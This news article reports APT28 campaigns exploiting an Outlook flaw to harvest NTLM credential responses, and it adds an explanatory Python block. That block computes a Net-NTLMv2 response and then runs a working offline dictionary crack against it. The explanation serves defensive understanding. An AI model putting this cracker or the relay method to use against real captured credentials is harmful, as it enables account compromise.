A threat group associated with the Russian military intelligence service was behind several mass attack campaigns that exploited known flaws in Outlook and WinRAR to collect Windows NTLM credential hashes from organizations in Europe and North America. The high volume of emails is unusual for cyberespionage groups, which are typically highly targeted in their victim selection.
“Proofpoint observed a significant deviation from expected volumes of emails sent in campaigns exploiting CVE-2023-23397 — a Microsoft Outlook elevation of privilege vulnerability,” researchers from security firm Proofpoint said in a report. “This included over 10,000 emails sent from the adversary, from a single email provider, to defense, aerospace, technology, government, and manufacturing entities, and, occasionally, included smaller volumes at higher education, construction, and consulting entities.”
The CVE-2023-23397 vulnerability was patched by Microsoft in March 2023, after APT28, also known as Fancy Bear, had exploited it for almost a year as a zero-day in attacks against organizations in the government, military and energy sectors. Those earlier attacks stayed under the radar because of their highly targeted nature.
The vulnerability is classed as an elevation of privilege flaw, but it is triggered without any user interaction: a crafted calendar or task item whose reminder property points at a UNC path causes the Microsoft Outlook desktop client to initiate an SMB connection to a remote attacker-controlled server as soon as the item is processed. Because SMB is the file-sharing protocol of Windows networks and authenticates with NTLM by default, that callback includes an NTLM authentication attempt, and the challenge-response derived from the user's credentials (the Net-NTLMv2 "hash") is delivered to the attacker's server.
Capturing that material enables an NTLM relay attack: the attacker, having tricked the victim's computer into authenticating to a server it controls, forwards that authentication in real time to another legitimate service that accepts it, for example an SMB share or an Exchange endpoint that does not enforce signing. The captured challenge-response can also be cracked offline to recover the password. It is not directly usable for pass-the-hash, which requires the NT hash itself rather than a response bound to one server challenge.
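What leaves the victim's machine in this attack is a Net-NTLMv2 challenge-response, not the NT hash. The following Python is an added illustration, not code from the Proofpoint report or from the attackers: it computes that response the way a Windows client does (NT hash, NTOWFv2, NTProofStr, per MS-NLMP), emits it in the user::domain:challenge:proof:blob form that capture tools commonly use, and then runs the attacker's offline dictionary attack against it. The user, domain, password, challenges, timestamp and wordlist are all constructed sample values. MD4 is implemented in pure Python because many OpenSSL 3 builds disable it in hashlib.

```python
"""Net-NTLMv2 capture and offline crack. Added illustration; all names, nonces and passwords are constructed."""
import hashlib
import hmac
import struct
from typing import Optional

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed because OpenSSL 3 builds often disable MD4 in hashlib."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"                       # pad: 0x80, zeros to 56 mod 64, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean fn, round constant, message-word order, shift amounts)
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c               # rotate roles for the next step
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). This is what pass-the-hash needs, and it never leaves the host here."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain (domain keeps its case)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def av_pair(av_id: int, value: bytes) -> bytes:
    """One AV_PAIR (id, length, value) from the server's target info."""
    return struct.pack("<HH", av_id, len(value)) + value


def ntlmv2_blob(filetime: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: version bytes, reserved, FILETIME, client nonce, reserved, AV pairs, reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob). Bound to this challenge, so not replayable later."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def sample_capture() -> str:
    """Constructed capture in the user::domain:serverchallenge:proof:blob form used by Responder and hashcat -m 5600."""
    user, domain, password = "j.doe", "CORP", "Winter2023!"       # constructed victim (assumption)
    server_challenge = bytes.fromhex("1122334455667788")            # attacker-chosen nonce (constructed)
    client_challenge = bytes.fromhex("a1b2c3d4e5f60718")            # victim-chosen nonce (constructed)
    filetime = (1678800000 + 11644473600) * 10_000_000              # fixed FILETIME: 100 ns ticks since 1601
    target_info = (av_pair(2, domain.encode("utf-16le"))            # MsvAvNbDomainName
                   + av_pair(1, "FS01".encode("utf-16le"))          # MsvAvNbComputerName (constructed)
                   + av_pair(0, b""))                               # MsvAvEOL
    blob = ntlmv2_blob(filetime, client_challenge, target_info)
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_capture(line: str, wordlist) -> Optional[str]:
    """Offline dictionary attack: recompute NTProofStr per candidate; no contact with the victim or a DC is needed."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    server_challenge, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, server_challenge, blob), proof):
            return candidate
    return None


if __name__ == "__main__":
    captured = sample_capture()
    print(captured)
    print("recovered:", crack_capture(captured, ["password", "Summer2023!", "Welcome1", "Winter2023!"]))
```

Two things the block makes concrete: the attacker only ever sees the HMAC output and the blob, never the NT hash, so a weak password is recovered only by guessing; and because the server challenge is an input to NTProofStr, a recorded response is useless against any other server later, which is why the attack has to relay the authentication live or crack it offline.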
According to Proofpoint, after Microsoft patched the vulnerability in March, APT28 continued to use it in attacks and even ramped up the scale of its campaigns. The malicious emails had a subject of “Test meeting” and contained a specially crafted file in the Transport Neutral Encapsulation Format (TNEF) with a fake CSV, Excel, or Word document extension.